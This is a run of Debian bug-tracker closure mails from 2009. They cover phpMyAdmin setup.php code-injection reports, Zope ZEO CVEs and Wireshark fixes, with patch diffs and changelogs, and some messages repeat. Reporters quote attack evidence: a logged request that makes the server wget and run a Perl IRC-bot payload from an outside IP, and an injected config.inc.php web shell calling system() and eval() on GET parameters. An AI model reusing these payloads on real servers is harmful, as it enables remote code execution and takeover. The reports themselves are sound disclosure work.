$cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? Obviously the host___if___GET__c__... part is somewhat escaped and prevents the full attack and was intended to use parameters 'c' and 'p' later to be eval'd and displayed. Instead things are simply broken by the attack. The auth_type being set to 'config' is what breaks the installation. The normal case for us here is 'cookie'. That didn't happen due to the protection in place in 4:2.9.1.1-11 but the system was brought down to a broken state. I repaired this by purging the installation and reinstalling to create a clean config.inc.php file and then ensuring that this file is included in intrusion detection monitoring but I am certain that the vulnerability for a repeat attack is likely. I have this host configured for daily automatic security upgrades. Therefore this system always has the latest version with 24 hours of a release of an update. The system has always been fully up to date and it appears that the current stable released package has this denial attack potential. Here is the recent upgrade history from the dpkg.log file: 2008-12-01 04:06:11 upgrade phpmyadmin 4:2.9.1.1-8 4:2.9.1.1-9 2009-02-12 04:14:24 upgrade phpmyadmin 4:2.9.1.1-9 4:2.9.1.1-10 2009-06-26 04:12:51 upgrade phpmyadmin 4:2.9.1.1-10 4:2.9.1.1-11 I don't know how this attack was able to use setup.php to write to the config.inc.php file but the timestamps of the file correlate between the Apache access log and the resulting config.inc.php file. The phpmyadmin web interface was working prior to the attack and was not functional after the attack so this cannot have been left over from an attack on the previous version. Bob -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2 2.2.3-4+etch10 Next generation, scalable, extenda ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none
Bug#540464: marked as done (CVE-2009-0668, CVE-2009-0669)
Your message dated Sun, 25 Oct 2009 19:57:42 + with message-id e1n29di-0001te...@ries.debian.org and subject line Bug#540464: fixed in zope2.10 2.10.6-1+lenny1 has caused the Debian Bug report #540464, regarding CVE-2009-0668, CVE-2009-0669 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 540464: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=540464 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: zope2.10 Severity: serious Tags: security patch -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Two vulnerabilities have been reported in Zope, which can be exploited by malicious people to bypass certain security restrictions and compromise a vulnerable system. 1) A missing access control check was found in the way Zope Enterprise Objects (ZEO) used to manage remote connections to the Zope server. A remote attacker could use this flaw to execute arbitrary Python code in the context of Zope server. (CVE-2009-0668)[0] 2) A weakness was found in the Zope Enterprise Objects (ZEO) authentication protocol. A remote attacker could use this flaw to bypass the authentication to the Zope Object Database (ZODB). (CVE-2009-0669)[1] If you fix the vulnerabilities please also make sure to include the CVE ids in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0668 http://security-tracker.debian.net/tracker/CVE-2009-0668 [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0669 http://security-tracker.debian.net/tracker/CVE-2009-0669 http://mail.zope.org/pipermail/zope-announce/2009-August/002220.html Cheers, Giuseppe. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkp9N8EACgkQNxpp46476arVPQCeOfUT1sVlZUSXMETleD8pD+6A AA8AniYpFrHT9ERJ5UpgFXkcHkxgDIqF =UJsU -END PGP SIGNATURE- === StorageServer.py == --- StorageServer.py (revision 167632) +++ StorageServer.py (local) @@ -111,7 +111,7 @@ for func in self.extensions: self._extensions[func.func_name] = None -def finish_auth(self, authenticated): +def _finish_auth(self, authenticated): if not self.auth_realm: return 1 self.authenticated = authenticated @@ -421,6 +421,7 @@ def new_oids(self, n=100): Return a sequence of n new oids, where n defaults to 100 +n = min(n, 100) if self.read_only: raise ReadOnlyError() if n = 0: === auth/auth_digest.py == --- auth/auth_digest.py (revision 167632) +++ auth/auth_digest.py (local) @@ -121,7 +121,7 @@ check = hexdigest(%s:%s % (h_up, challenge)) if check == response: self.connection.setSessionKey(session_key(h_up, self._key_nonce)) -return self.finish_auth(check == response) +return self._finish_auth(check == response) extensions = [auth_get_challenge, auth_response] === tests/auth_plaintext.py == --- tests/auth_plaintext.py (revision 167632) +++ tests/auth_plaintext.py (local) @@ -41,7 +41,7 @@ self.connection.setSessionKey(session_key(username, self.database.realm, password)) -return self.finish_auth(dbpw == password_dig) +return self._finish_auth(dbpw == password_dig) class PlaintextClient(Client): extensions = [auth] === zrpc/connection.py == --- zrpc/connection.py (revision 167632) +++ zrpc/connection.py (local) @@ -24,7 +24,7 @@ import ThreadedAsync from ZEO.zrpc import smac from ZEO.zrpc.error import ZRPCError, DisconnectedError -from ZEO.zrpc.marshal import Marshaller +from ZEO.zrpc.marshal import Marshaller, ServerMarshaller from ZEO.zrpc.trigger import trigger from ZEO.zrpc.log import short_repr, log from ZODB.loglevels import BLATHER, TRACE @@ -883,6 +883,7 @@ def __init__(self, sock, addr, obj, mgr): self.mgr = mgr self.__super_init(sock, addr, obj, 'S') +self.marshal = ServerMarshaller() self.obj.notifyConnected(self) def handshake(self): === zrpc/marshal.py == --- zrpc/marshal.py (revision 167632) +++ zrpc/marshal.py (local) @@ -52,6 +52,20 @@ level=logging.ERROR)
Bug#535044: marked as done (phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vw...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #543460, regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.9.1.1-13 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.9.1.1-13.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz phpmyadmin_2.9.1.1-13.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc phpmyadmin_2.9.1.1-13_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Sun, 25 Oct 2009 12:25:47 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.9.1.1-13 Distribution: oldstable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - Administrate MySQL over the WWW Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low . * Fix inverted logic in documentation of new script. . phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high . * Upload to oldstable to fix security issues. * Cross site scripting (CVE-2009-3696, closes: #552194). * Allow saving of configuration from setup script only after explicit action from administrator (closes: #535044, #543460). Files: 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz 85eaa36525db64fdd0ba9955c9def399 3605314 web extra phpmyadmin_2.9.1.1-13_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9
Bug#535044: marked as done (phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001t0...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #543460, regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.11.8.1-5+lenny3 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.11.8.1-5+lenny3.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz phpmyadmin_2.11.8.1-5+lenny3.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc phpmyadmin_2.11.8.1-5+lenny3_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 12:30:40 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.11.8.1-5+lenny3 Distribution: stable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - MySQL web administration tool Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low . * Correct some documentation issues of new script. . phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high . * Upload to stable to fix security issues. * Fixes XSS and SQL injection (Closes: #552194). [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697] * Allow saving of configuration from setup script only after explicit action from administrator (Closes: #535044, #543460). Checksums-Sha1: 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e73e24d04b0c73386de7ae4e112227d17eae7d98 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
Bug#551949: marked as done (phpmyadmin: Denial of Service Attack through setup.php)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vu...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #535044, regarding phpmyadmin: Denial of Service Attack through setup.php to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: important Reporting a remote denial of service attack against phpmyadmin's setup.php interface. After the attack the web interface is not usable. The web client displays the following text. Welcome to phpMyAdmin 2.9.1.1-Debian-11 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server. Error MySQL said: #1045 - Access denied for user 'root'@'localhost' (using password: NO) After the attack the following file exists: -rw-r- 1 root root 746 2009-10-04 15:23:40 /var/lib/phpmyadmin/config.inc.php Here are the contents of that file: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.9.1.1-Debian-11 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 9484 2006-10-03 13:11:22Z nijel $ * Date: Sun, 04 Oct 2009 15:23:40 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host___if___GET__cecho___pre___system___GET__cechopreif___GET__pecho___pre___eval___GET__pechopre___'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? Obviously the host___if___GET__c__... part is somewhat escaped and prevents the full attack and was intended to use parameters 'c' and 'p' later to be eval'd and displayed. Instead things are simply broken by the attack. The auth_type being set to 'config' is what breaks the installation. The normal case for us here is 'cookie'. That didn't happen due to the protection in place in 4:2.9.1.1-11 but the system was brought down to a broken state. I repaired this by purging the installation and reinstalling to create a clean config.inc.php file and then ensuring that this file is included in intrusion detection monitoring but I am certain that the vulnerability for a repeat attack is likely. I have this host configured for daily automatic security upgrades. Therefore this system always has the latest version with 24 hours of a release of an update. The system has always been fully up to date and it appears that the current stable released package has this denial attack potential. Here is the recent upgrade history from the dpkg.log file: 2008-12-01 04:06:11 upgrade phpmyadmin 4:2.9.1.1-8 4:2.9.1.1-9 2009-02-12 04:14:24 upgrade phpmyadmin 4:2.9.1.1-9 4:2.9.1.1-10 2009-06-26 04:12:51 upgrade phpmyadmin 4:2.9.1.1-10 4:2.9.1.1-11 I don't know how this attack was able to use setup.php to write to the config.inc.php file but the timestamps of the file correlate between the Apache access log and the resulting config.inc.php file. The phpmyadmin web interface was working prior to the attack and was not functional after the attack so this cannot have been left over from an attack on the previous version. Bob -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2 2.2.3-4+etch10 Next generation, scalable, extenda ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none
Bug#533347: marked as done (wireshark: new upstream version (1.0.8) available with security fixes)
Your message dated Sun, 25 Oct 2009 19:57:40 + with message-id e1n29dg-0001sr...@ries.debian.org and subject line Bug#533347: fixed in wireshark 1.0.2-3+lenny6 has caused the Debian Bug report #533347, regarding wireshark: new upstream version (1.0.8) available with security fixes to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 533347: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=533347 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Source: wireshark Version: 1.0.2-3+lenny5 Severity: critical Tags: patch security Hi, There is a new upstream version available: http://www.wireshark.org/docs/relnotes/wireshark-1.0.8.html It contains several security related fixes, collected in the attached patch. Cheers, Balint Index: debian/patches/28_uat_proto_name_use_strndup.dpatch === --- debian/patches/28_uat_proto_name_use_strndup.dpatch (revision 0) +++ debian/patches/28_uat_proto_name_use_strndup.dpatch (revision 0) @@ -0,0 +1,66 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 22_uat_proto_name_use_strndup.dpatch by ebli...@oceanus.sz13.dyndns.org +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Use g_strndup() instead of ep_strndup() to avoid freeing it up too early + +...@dpatch@ + +Index: trunk/epan/uat.h +=== +--- trunk/epan/uat.h (revision 27662) trunk/epan/uat.h (revision 27663) +@@ -452,7 +452,7 @@ + #define UAT_PROTO_DEF(basename, field_name, dissector_field, name_field, rec_t) \ + static void basename ## _ ## field_name ## _set_cb(void* rec, const char* buf, unsigned len, void* u1 _U_, void* u2 _U_) {\ + if (len) { \ +- ((rec_t*)rec)-name_field = ep_strndup(buf,len); g_strdown(((rec_t*)rec)-name_field ); g_strchug(((rec_t*)rec)-name_field); \ ++ ((rec_t*)rec)-name_field = g_strndup(buf,len); g_strdown(((rec_t*)rec)-name_field ); g_strchug(((rec_t*)rec)-name_field); \ + ((rec_t*)rec)-dissector_field = find_dissector(((rec_t*)rec)-name_field); \ + } else { \ + ((rec_t*)rec)-dissector_field = find_dissector(data); \ +Index: trunk/epan/dissectors/packet-user_encap.c +=== +--- trunk/epan/dissectors/packet-user_encap.c (revision 27662) trunk/epan/dissectors/packet-user_encap.c (revision 27663) +@@ -126,9 +126,27 @@ + } + } + +-static void user_update_cb(void* r _U_, const char** err _U_) { ++static void* user_copy_cb(void* dest, const void* orig, unsigned len _U_) ++{ ++ const user_encap_t *o = orig; ++ user_encap_t *d = dest; ++ ++ d-payload_proto_name = g_strdup(o-payload_proto_name); ++ d-header_proto_name = g_strdup(o-header_proto_name); ++ d-trailer_proto_name = g_strdup(o-trailer_proto_name); ++ ++ return d; + } + ++static void user_free_cb(void* record) ++{ ++ user_encap_t *u = record; ++ ++ if (u-payload_proto_name) g_free(u-payload_proto_name); ++ if (u-header_proto_name) g_free(u-header_proto_name); ++ if (u-trailer_proto_name) g_free(u-trailer_proto_name); ++} ++ + UAT_VS_DEF(user_encap, encap, user_encap_t, WTAP_ENCAP_USER0, ENCAP0_STR) + UAT_PROTO_DEF(user_encap, payload_proto, payload_proto, payload_proto_name, user_encap_t) + UAT_DEC_CB_DEF(user_encap, header_size, user_encap_t) +@@ -177,9 +195,9 @@ + num_encaps, + UAT_CAT_FFMT, + ChUserDLTsSection, ++ user_copy_cb, + NULL, +- user_update_cb, +- NULL, ++ user_free_cb, + user_flds ); + + prefs_register_uat_preference(module, Property changes on: debian/patches/28_uat_proto_name_use_strndup.dpatch ___ Added: svn:mergeinfo Index: debian/patches/31_ndmp_crash_fix.dpatch === --- debian/patches/31_ndmp_crash_fix.dpatch (revision 0) +++ debian/patches/31_ndmp_crash_fix.dpatch (revision 0) @@ -0,0 +1,57 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 25_ndmp_crash_fix.dpatch by ebli...@oceanus.sz13.dyndns.org +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Check pointers in NDMP dissector to prevent crash + +...@dpatch@ + +Index: trunk/epan/dissectors/packet-ndmp.c +=== +--- trunk/epan/dissectors/packet-ndmp.c (revision 28408) trunk/epan/dissectors/packet-ndmp.c (revision 28409) +@@ -1181,7 +1181,7 @@ + tvb_rlen=16; + cdb_tvb=tvb_new_subset(tvb, offset, tvb_len, tvb_rlen); +
Bug#543460: marked as done (phpmyadmin: No password protection for setup.php script)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vu...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #535044, regarding phpmyadmin: No password protection for setup.php script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicius code to execute commands as www-data user. This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack: /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo '/pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo '/pre';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none (no description available) pn php5-mcrypt | php4-mcrypt none (no description available) -- debconf information: phpmyadmin/setup-username: admin phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.9.1.1-13 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.9.1.1-13.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz phpmyadmin_2.9.1.1-13.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc phpmyadmin_2.9.1.1-13_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 535...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Sun, 25 Oct 2009 12:25:47 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.9.1.1-13 Distribution: oldstable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - Administrate MySQL over the WWW Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low . * Fix inverted logic in documentation of new script. . phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high . * Upload to oldstable to fix security issues. * Cross site scripting (CVE-2009-3696, closes: #552194). * Allow saving of configuration from setup script only after explicit action from administrator (closes: #535044, #543460). Files: 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz 85eaa36525db64fdd0ba9955c9def399 3605314 web extra phpmyadmin_2.9.1.1-13_all.deb -BEGIN PGP SIGNATURE-
Bug#551949: marked as done (phpmyadmin: Denial of Service Attack through setup.php)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001t0...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #543460, regarding phpmyadmin: Denial of Service Attack through setup.php to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: important Reporting a remote denial of service attack against phpmyadmin's setup.php interface. After the attack the web interface is not usable. The web client displays the following text. Welcome to phpMyAdmin 2.9.1.1-Debian-11 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server. Error MySQL said: #1045 - Access denied for user 'root'@'localhost' (using password: NO) After the attack the following file exists: -rw-r- 1 root root 746 2009-10-04 15:23:40 /var/lib/phpmyadmin/config.inc.php Here are the contents of that file: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.9.1.1-Debian-11 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 9484 2006-10-03 13:11:22Z nijel $ * Date: Sun, 04 Oct 2009 15:23:40 GMT */ /* Servers configuration */ $i 